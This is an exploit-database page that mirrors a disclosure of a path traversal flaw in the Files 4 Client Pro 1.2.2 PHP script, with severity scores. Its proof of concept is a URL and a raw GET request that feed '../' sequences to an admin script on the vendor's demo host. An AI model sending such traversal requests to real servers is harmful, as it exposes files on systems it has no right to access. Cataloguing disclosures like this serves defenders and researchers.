Advertisement






Files 4 Client Pro - Easy File Transfer v1.2.2 - Path Traversal

CVE Category Price Severity
CVE-2020-27002 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-30
CPE
cpe:cpe:/a:files-4-client-pro-easy-file-transfer:1.2.2
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070147

Below is a copy:

Files 4 Client Pro - Easy File Transfer v1.2.2 - Path Traversal
[+] Exploit Title: Files 4 Client Pro - Easy File Transfer v1.2.2 - Path Traversal
[+] Google Dork: 
[+] Date: 2020-07-30
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Kevin Schiffer [ https://kevinschiffer.com ]
[+] Software Version: 1.2.2
[+] Software Link: https://codecanyon.net/item/files-4-client-pro-easy-file-transfer/8916122
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-22



### [ Info: ]

[i] A Path Traversal (aka Directory Traversal) vulnerability was discovered in the Files 4 Client Pro PHP script through 1.2.2.



### [ PoC: ]

[!] http://projects.kevinschiffer.de/files4client-pro/admin/editlink.php?link=/../../../../

[!] GET /files4client-pro/admin/editlink.php?link=/../../../../ HTTP/1.1
Host: projects.kevinschiffer.de



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.